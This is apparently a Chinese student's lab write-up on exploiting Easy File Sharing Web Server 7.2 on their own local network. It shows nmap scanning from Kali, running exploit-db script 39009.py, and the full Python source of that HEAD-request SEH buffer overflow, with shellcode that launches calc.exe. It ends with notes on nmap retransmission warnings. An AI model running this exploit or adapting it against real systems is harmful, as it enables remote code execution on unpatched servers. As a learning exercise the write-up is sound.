1.启easyfilesharing
2.查看本机ip(这里为我手机热点连接,看WLAN下的ip)
3.修改好easyfilesharing的访问地址和开发端口,并访问一下
主机上可访问,已经正常启动
4.用虚拟机扫描查看开放的的端口和对应服务
nmap -T4 -V -sV 192.168.43.246
可以看出我的主机开放了一些端口并提供了一些对应的服务,其中8000端口开放了http服务,并显示了其端口上运行软件的版本(稍后会自行百度查找其他的端口开放服务)
既然开放了http服务,就从kali端访问一下
是可以正常的,但是这个登录界面不知道登录用户的账号密码,所以暂时不管(之后会试试弱口令爆破),可以看到最下面的一句话
Powered by Easy File Sharing Web Sever Copyright@2012 EFS Sofitware lnc ,告诉我们了这个是有easyfilesharing提供技术服务支持的,
5.kali search一下easyfilesharing的可利用漏洞脚本。
6.运行漏洞脚本
这里运行一个python打开39009.py的脚本
/// 基本格式
python /usr/share/exploitdb/'脚本文件路径'
///
python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.43.246 8000
成功done掉
这时主机弹出计算机,而且easyfilesharing直接掉了
一次简单的局域网内的远程控制模拟就实现了。
虽然说是知道了用这些指令和脚本会实现对服务器进行远程控制和执行一些特定的脚本操作,但是还是不太懂这些原理,,所以去找了脚本的源码看了看
https://www.exploit-db.com/exploits/39009
# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
import socket
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
a = socket.socket()
print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))
entire=4500
# Junk
buff = "A"*4061
# Next SEH
buff+= "\xeb\x0A\x90\x90"
# pop pop ret
buff+= "\x98\x97\x01\x10"
buff+= "\x90"*19
# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
buff+= shellcode
buff+= "\x90"*7
buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
# HEAD
a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n")
a.close()
print "Done..."
大概说的是利用头请求造成缓冲区溢出,这样溢出使指针地址到计算器,所以就主机就弹出了计算器。
39008.py也是这个道理,只不过请求方式改为get,在get缓冲区中造成溢出。
…至于shellcode我也不会写,知道niup就完事了。
44485.py为堆栈溢出
这里有很多的溢出利用脚本
关于遇到的一些问题
这里的话首先遇到的问题就是nmap扫描时给了一个这个警告,其次我nmap扫描的真的是太慢了(同组成员电脑扫描的速度是我的n倍,一度怀疑是我硬件和人品有问题)
Warning: 192.168.43.246 giving up on port because retransmission cap hit (6).
之后去百度没什么收获,如何去google发现了有人跟我一样的问题,但是一堆英文…
感谢翻译软件
总之就是我的nmap扫描的最大重放次数为6,但是有非默认的扫描重放次数到达了6次,所以就爆出了这个warning
看来这确实可以让我觉得是硬件导致的数据包丢失,可以同过 -T4或-T5加快(一般用-T4就行),更改 --max retries也行,只是不知道怎么改配置文件
之后用 -T4
虽然快了些,但还是出了这个warning,…
用 -F 不会warning,很快,但是端口也是扫描的少,8000都没给扫出来
还有就是之
后的扫描
??(* —*)?? 有一个无法识别的服务,并且不知道它的 服务/版本 ,我猜是easyfilesharing了,因为他 -sV 出来的版本信息和我用的实际版本不一样,应该是我kali里面的nmap版本太低了吧。
不用 -sV 检查版本确实快了,也没有了warning…算是解决了
1078
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
